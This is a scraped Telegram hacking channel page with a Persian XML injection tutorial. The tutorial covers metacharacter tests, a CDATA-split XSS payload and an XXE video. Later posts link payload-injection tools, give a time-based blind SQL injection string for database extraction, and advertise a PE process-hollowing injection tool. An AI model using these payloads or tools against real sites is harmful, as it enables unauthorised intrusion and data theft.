0Day.Today | Learn Exploit | Zero World | Dark web |
14.2K subscribers
1.11K photos
76 videos
462 files
1.09K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_1

اموزش باگ XML .
قسمت : اول

@LearnExploit 🌀
IR0Day.Today BOY'S
0Day.Today | Learn Exploit | Zero World | Dark web |
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_1 اموزش باگ XML . قسمت : اول @LearnExploit 🌀 IR0Day.Today BOY'S
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_1

🔰 در خدمت شما هستیم با اموزش XML-Injection :

✳️ 1 - تعریف ساده از XML :
XML (Extensible Markup Language)
که یک زبان نشانه گذاری ساده میباشد که برای سازماندهی کردن، ذخیره کردن و فرستادن اطلاعات⁦ به کار میرود.
مهمترین نکته در مورد XML :
تگ های XML از قبل تعریف شده نیستند، شما خودتان باید آنها را تعریف کنید.‌‏
ایکس ام ال (XML) از یک (Document Type Definition) DTD برای شرح اطلاعات استفاده میکند.

✳️ 2 - نحوه ی کشف اسیب پذیری :
❇️ 2_1 - نحوه ی کارکردن برنامه :
فرض کنید که یک برنامه تحت وب از رابط سبک XML برای ثبت نام کاربران استفده میکند و این کارو با ایجاد گروه جدیدی به نام <user> و در فایلی به نام XML_db.xml ذخیره میکند.
💤 محتویات فایل XML_db.cml :
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>X0P4SH4</username>
<password>!3C</password>
<userid>0</userid>
<mail>LearnExploit@gmail.com</mail>
</user>
<user>
<username>Evil_Boy</username>
<password>13c</password>
<userid>500</userid>
<mail>LearnExploit_2@gmail.com</mail>
</user>
</users>
هنگامی که یک کاربر با پر کردن یک فرم HTML خود را ثبت می کند، برنامه داده های کاربر را در یک درخواست استاندارد دریافت می کند، که به خاطر ساده بودن قرار است به عنوان یک درخواست GET ارسال شود.
به مثال زیر دقت کنید :
Username: Mobin
Password: Un!e
E-mail: LearnExploit_3@Gmail.com
اطلاعاتی که توسط متد GET فرستاده میشن :
http://www.LearnExploit.com/addUser.php?username=Mobin&password=Un!e&email=LearnExploit_3@Gmail.com
بعد فرمی شبیه فرم زیر در فایل XML_db.xml ساخته میشود :
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>X0P4SH4</username>
<password>!3C</password>
<userid>0</userid>
<mail>LearnExploit@gmail.com</mail>
</user>
<user>
<username>Evil_Boy</username>
<password>13c</password>
<userid>500</userid>
<mail>LearnExploit_2@gmail.com</mail>
</user>
<user>
<username>Mobin</username>
<password>Un!e</password>

<userid>500</userid>
<mail>LearnExploit_3@gmail.com</mail>
</user>
</users>
ساخته میشود.
❇️ 2_2 - نحوه ی تست برنامه :
برای تست اسیب پذیری برنامه از metacharacters های XML استفاده میکنید.
مهمترین و ساده ترین کاراکتر های موجود در XML :
• Single quote: ( ' ) :::
مقدار زیر رو در نظر بگیرید دوستان :
<node attrib='$inputValue'/>
پس اگه ورودی ما به صورت :
inputValue = amir'
باشه
در نتیجه نحوه ی قرار گیری در داخل فایل XML_db.xml به صورت زیر خواهد بود :
<node attrib='amir''/>
پس در نتیجه فایل XML_db.xml به خوبی شکل نمیگیره.

• Double quote: ( " ) :::
مورد دیگر دابل کوتیشن میباشد که همانند تک کتیشن کار میکند. (نیاز به توضیح اضافه ندارد.)

• Angular parentheses: ( > و < )
مورد سوم استفاده از پرانتز ها میباشد که اگر ورودی ما به صورت زیر :
Username = amir<
باشد ،نحوه ی قرار گیری در فایل به صورت زیر خواهد بود :
<user>
<username>amir<</username>
<password>4kb!e</password>
<userid>500</userid>
<mail>LearnExploit_4@gmail.com</mail>
</user>
و باعث ایجاد اررور میشه.

• Comment tag: ( <!--/--> )
حالت چهارم یعنی کامنت نیز همانند پرانتز ها عمل میکنه...

⚠️ دوستان به پایان بخش اول از اموزش XML- Injection رسیدیم ،امیدوارم که از این اموزش هم نهایت استفاده رو کرده باشید.
⚠️ نوشته شده در گروه اموزشی LearnExploit .

@LearnExploit 🌀
IR0Day.Today BOY'S
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_2

اموزش باگ XML .
قسمت : دوم

@LearnExploit 🌀
IR0Day.Today BOY'S
0Day.Today | Learn Exploit | Zero World | Dark web |
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_2 اموزش باگ XML . قسمت : دوم @LearnExploit 🌀 IR0Day.Today BOY'S
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_2

🔰 در خدمت شما هستیم با اموزش XML-Injection بخش دوم :

مورد پنجم و ششم برای کشف اسیب پذیری در xml :

• Ampersand: ( & ) ::::
⚜️ امپرسند یا (&) در XML برای نشان دادن موجودیت ها استفاده میشود.
منظور از موجودیت ها (برای مشاهده موجودیت ها بر روی pic بزنید)
Pic
مثال زیر رو در نظر بگیرید :
<tagnode>&lt;</tagnode>
&lt; = <
مباشدو از قبل برای XML تعریف شده و XML با گذاشتن ( ; ) میتونه اونو تفسیر کنه...
اما حالا مثال زیر رو در نظر بگیرید :
Username = &AMIR
نحوه ی قرار گیری در فایل :
<user>
<username>&AMIR</username>
<password>root</password>
<userid>0</userid>
<mail>LearnExploit@gmail.com</mail>
</user>
در این کد مفسر با قرار دادن ( ; ) در اخر
&AMIR;
اونو شناسایی نمیکنه و
&AMIR;
ورودی هست که مفسر اونو نمیشناسه و مشکل ایجاد میشه...

مورد دیگر
⚜️ اختیارات بخش CDATA یا
CDATA section delimiters
میباشد.
که به صورت زیر میباشد :
• CDATA section delimiters: ( <![CDATA[ / ]]> )
در این حالت کاراکتر هایی که داخل CDATA قرار دارن توسط مفسر XML تفسیر نمیشن :
به مثال زیر دقیت کنید :
فرم کلی یک فایل HTML :
<html>
$HTMLCode
</html>
الان در $HTMLCODE کد های زیر رو وارد میکنیم :
$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
نحوه ی قرار گیری در فرم :
<html>
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
</html>
وقتی مفسر اونارو تفسیر میکنه نتیجه کد زیر میشه :
<script>alert('XSS')</script>
که حاکی از وجود باگ XSS میباشد.

🆘 به پایان بخش دوم از اموزش Xml-Injection رسیدیم.
♨️ امید بران است که نهایت استفاده از این اموزش کرده باشین دوستان.
⚠️ اختصاصی از گروه اموزشی LearnExploit .

@LearnExploit 🌀
IR0Day.Today BOY'S
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_3

اموزش باگ XML .
قسمت : سوم

@LearnExploit 🌀
IR0Day.Today BOY'S
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_3 #XXE

اموزش باگ XML .
〽️قسمت : سوم
🔆در این ویدیو که برای شما اماده شده یاد میگیرید که :
⭕️1 - ایکس ایکس ای (XXE) چیست ؟
⭕️2 - اموزش و نحوه ی خواندن اکسپلویت های XXE
⭕️3 - تست اسیب پذیری XXE
⭕️4 - استفاده از سه نوع اکسپلویت (Remote file - XSS - CDATA XSS)


🚸به پایان بخش سوم از اموزش Xml-Injection رسیدیم.
♨️امید بران است که نهایت استفاده رو از این اموزش کرده باشین .
⚠️اختصاصی از گروه اموزشی LearnExploit .

@LearnExploit 🌀
IR0Day.Today BOY'S
File.xml
1.5 KB
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_3 #XXE #File

فایل استفاده شده در اموزش
(از قلم افتاده 😁)

@LearnExploit 🌀
IR0Day.Today BOY'S
Payload Injector:

Debinject:
😸 GitHub

Pixload:
😸 GitHub

Gospider:
😸 GitHub

#Injection #Hacking_Tool #BugBounty

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
SQL Injection

After this, I used ghauri to extract the database It was successful

-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--

#SQL #Injection #ghauri #BugBounty #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Ghostly Hollowing Via Tampered Syscalls

Implementing the ghostly hollowing PE injection technique using tampered syscalls.

😸 Github

⬇️ Download
🔒 LearnExploit

#syscall #Injection

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM